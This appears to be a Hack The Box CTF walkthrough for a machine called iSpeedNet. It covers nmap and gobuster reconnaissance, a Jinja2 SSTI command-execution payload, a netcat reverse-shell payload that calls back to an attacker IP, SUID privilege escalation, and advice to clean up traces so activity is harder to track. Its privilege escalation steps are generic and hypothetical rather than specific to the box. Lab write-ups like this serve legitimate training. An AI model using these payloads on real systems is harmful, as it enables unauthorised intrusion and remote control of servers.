ISpeedNet Hack The Box Walkthrough: A Comprehensive Guide

Hey guys! Today, we're diving deep into the iSpeedNet machine on Hack The Box. This box is a fantastic way to sharpen your web application and network analysis skills. We'll walk through each step, from initial reconnaissance to rooting the box. So, buckle up and let's get started!

Initial Reconnaissance: Nmap Scan

First things first, reconnaissance is key. We need to figure out what services are running on the iSpeedNet machine. Let's kick things off with an nmap scan. Nmap, or Network Mapper, is a powerful tool used for network discovery and security auditing. It works by sending packets to target hosts and analyzing the responses. By examining these responses, nmap can determine a wealth of information, including what services are running, what operating system the host is using, what type of packet filters/firewalls are in place, and dozens of other characteristics.

To run a basic nmap scan, we can use the following command:

nmap -sV -sC -oN ispeednet.nmap 10.10.11.222

Let's break down this command:

• -sV: This option tells nmap to probe open ports to determine service/version info.
• -sC: This option enables the use of nmap's script engine to run common scripts against the target.
• -oN ispeednet.nmap: This saves the output in normal format to a file named ispeednet.nmap.
• 10.10.11.222: This is the target IP address (replace with the actual IP of the iSpeedNet machine).

After running the nmap scan, we analyze the results. Look for open ports and services that stand out. Common ports like 80 (HTTP), 443 (HTTPS), 22 (SSH), and 21 (FTP) are good starting points. Also, take note of the versions of the services running, as this information can be crucial for identifying known vulnerabilities. For instance, an older version of a web server might be vulnerable to specific exploits. In the context of iSpeedNet, we're particularly interested in web-related services, as they often serve as entry points for further investigation. As you analyze the nmap output, document any interesting findings and prioritize them for further investigation. Remember, thorough reconnaissance is the foundation for a successful penetration test or CTF challenge.

Web Application Analysis: Port 80

Now that we've identified port 80 (HTTP) as being open, let's dive into the web application. Open your browser and navigate to the iSpeedNet machine's IP address. The first thing you should do is poke around the site. Click on all the links, read all the text, and try to get a feel for what the application does. Look for any interesting functionalities or features that might be vulnerable.

Directory Bruteforcing with Gobuster

Next, we'll use Gobuster to bruteforce directories and files. Gobuster is an incredibly useful tool for discovering hidden content on web servers. It works by sending a large number of requests to the server, each with a different possible file or directory name. If the server responds with a success code (e.g., 200 OK), it means that the file or directory exists. This allows you to uncover hidden pages, configuration files, and other sensitive information that might not be linked to from the main website.

Here’s the command we'll use:

gobuster dir -u http://10.10.11.222 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

Let's break it down:

• dir: Specifies that we are performing directory bruteforcing.
• -u: The target URL (replace with the iSpeedNet machine's IP).
• -w: The wordlist to use (a common wordlist for directory bruteforcing).
• -t: The number of threads to use (adjust as needed for performance).

After running Gobuster, we might find some interesting directories, like /admin or /uploads. Make sure you investigate each one thoroughly. Look for any forms, login panels, or other interactive elements that could be exploited. Also, check the source code of the pages for any hidden comments or clues.

Examining robots.txt

Another important file to check is robots.txt. This file tells web crawlers which parts of the site not to index. Sometimes, developers accidentally leave sensitive directories or files listed in robots.txt, thinking that they will be hidden from search engines. However, anyone can view the contents of robots.txt, so it's always worth a look.

Navigate to http://10.10.11.222/robots.txt in your browser and see if there's anything interesting listed. If you find any directories or files that you haven't already investigated, make sure to check them out.

Exploitation: SSTI Vulnerability

After thorough analysis, we identified a potential Server-Side Template Injection (SSTI) vulnerability. SSTI vulnerabilities occur when an application embeds user input into a template engine without proper sanitization. This allows attackers to inject malicious code into the template, which can then be executed on the server. These vulnerabilities can be extremely dangerous, potentially leading to remote code execution and full control of the server.

Identifying the Vulnerability

To identify the SSTI vulnerability, we need to find a place where user input is being used in a template. This could be a search box, a comment form, or any other field where the user can enter text. Once we've found a potential injection point, we can try injecting some template code to see if it gets executed.

Common template engines include Twig, Jinja2, and Freemarker. Each template engine has its own syntax for accessing variables and executing code. To test for SSTI, you can try injecting simple expressions like {{7*7}} or ${7*7}. If the application is vulnerable, it will evaluate the expression and display the result (in this case, 49) in the response.

Exploiting the SSTI

Once we've confirmed the presence of an SSTI vulnerability, we can start exploiting it to gain access to the server. The exact steps will depend on the template engine being used, but the general idea is to inject code that allows us to execute arbitrary commands on the server.

For example, if the application is using Jinja2, we might be able to use the following payload to execute a command:

{{ ''.__class__.mro()[1].__subclasses__()[409]('whoami',shell=True,stdout=-1).communicate()[0] }}

This payload uses Python's reflection capabilities to access the os module and execute the whoami command. The output of the command is then returned in the response.

Getting a Shell

To get a shell on the server, we can use a similar payload to execute a reverse shell. A reverse shell is a type of shell in which the target machine initiates a connection back to the attacker's machine. This allows the attacker to control the target machine even if it is behind a firewall or NAT.

To set up a reverse shell, we first need to start a listener on our attacking machine. We can do this using netcat:

nc -lvnp 4444

This command tells netcat to listen on port 4444 for incoming connections. Once the listener is running, we can inject the following payload into the SSTI vulnerability:

{{ ''.__class__.mro()[1].__subclasses__()[409]('nc -e /bin/sh 10.10.14.6 4444',shell=True,stdout=-1).communicate()[0] }}

This payload executes the nc command on the target machine, which connects back to our attacking machine on port 4444 and spawns a shell. Once the connection is established, we will have a shell on the target machine.

Privilege Escalation: From Web User to Root

Now that we have a shell, the next step is to escalate our privileges to root. This means gaining administrative access to the system. There are many ways to escalate privileges on a Linux system, but we'll focus on a common technique: exploiting SUID binaries.

Identifying SUID Binaries

SUID (Set User ID) is a special type of permission that allows a program to be executed with the privileges of the owner of the file, rather than the user who is running it. This can be useful for allowing users to perform certain administrative tasks without giving them full root access. However, if a SUID binary has a vulnerability, it can be exploited to gain root access.

To find SUID binaries on the system, we can use the following command:

find / -perm -4000 2>/dev/null

This command searches the entire file system for files with the SUID permission set. The 2>/dev/null part redirects any error messages to /dev/null, so we only see the files that we have permission to access.

Exploiting SUID Binaries

Once we've identified some SUID binaries, we need to analyze them to see if they have any vulnerabilities. One common vulnerability is the ability to execute arbitrary commands. If a SUID binary allows us to specify a command to execute, we can use it to execute a command as root.

For example, if we find a SUID binary called vuln, and it allows us to specify a command to execute, we can run the following command to get a root shell:

./vuln /bin/sh

This command tells the vuln binary to execute the /bin/sh shell as root. Once the shell is running, we will have root access to the system.

Alternative Privilege Escalation Methods

If you can't find any exploitable SUID binaries, there are other privilege escalation methods you can try. Some common methods include:

• Exploiting kernel vulnerabilities: The Linux kernel sometimes has vulnerabilities that can be exploited to gain root access. These vulnerabilities are often patched quickly, but it's worth checking to see if the system is running an older, vulnerable kernel.
• Exploiting misconfigured services: Some services might be misconfigured in a way that allows you to gain root access. For example, a service might be running as root but have a weak password or a publicly accessible configuration file.
• Exploiting world-writable files: If there are any world-writable files on the system, you might be able to modify them to gain root access. For example, you could modify the /etc/passwd file to add a new user with a UID of 0 (root).

Cleaning Up

After successfully rooting the iSpeedNet machine, it's important to clean up after yourself. This includes removing any files you created, deleting any accounts you added, and reverting any configuration changes you made. This will help to prevent any damage to the system and make it harder for others to track your activity.

Conclusion

The iSpeedNet machine on Hack The Box is a great way to practice your web application and privilege escalation skills. By following the steps outlined in this walkthrough, you should be able to successfully root the box and gain a better understanding of common security vulnerabilities. Remember to always practice ethical hacking and respect the rules of the platform. Happy hacking, guys!